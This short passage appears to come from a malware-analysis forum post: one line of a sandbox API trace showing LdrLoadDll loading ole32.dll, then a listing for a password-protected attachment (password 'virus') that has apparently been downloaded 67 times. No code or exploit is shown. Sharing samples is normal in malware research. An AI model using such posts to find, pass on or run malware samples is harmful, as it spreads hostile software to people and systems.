Call System API API Name: LdrLoadDll Args: ( 1715e4, 0, ole32.dll, 758d0000 ) Return: 0 2816 2908
Attachments
pw: virus
(544.26 KiB) Downloaded 67 times